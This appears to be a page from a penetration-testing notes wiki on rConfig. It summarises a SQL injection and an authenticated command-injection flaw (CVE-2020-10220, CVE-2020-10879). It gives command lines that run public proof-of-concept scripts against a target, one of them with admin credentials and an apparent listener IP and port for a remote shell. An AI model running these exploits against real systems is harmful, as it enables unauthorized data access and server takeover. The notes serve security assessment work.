rConfig

rConfig is an open-source network configuration management tool primarily used for backing up and managing device configurations. It is commonly deployed in enterprise environments to automate configuration snapshots of routers, switches, and other network equipment. The application is PHP-based and relies on a MySQL backend, making it a frequent target for web application security assessments due to historically poor input sanitization and vulnerable database interactions.

SQLi

rConfig versions up before 3.9.5 are vulnerable to a SQLi flaw (CVE-2020-10220) through the searchColumn parameter in commands.inc.php. This flaw enables unauthorized access to sensitive data or manipulation of the database. A working PoC is available.

$ python3 48208.py https://<target-IP>

Authenticated RCE

rConfig versions up before 3.9.5 are also vulnerable to a command injection flaw (CVE-2020-10879) in lib/crud/search.crud.php. The nodeId parameter is passed directly to the exec function without proper sanitization, allowing an attacker to execute arbitrary commands on the server. A working PoC is also available.

$ python3 48241.py https://<target-IP> admin Pass123! 192.168.45.170 80

A PoC that combines both CVEs is available here.

PreviousRaspAP NextResponsive Filemanager

Last updated 3 days ago

Was this helpful?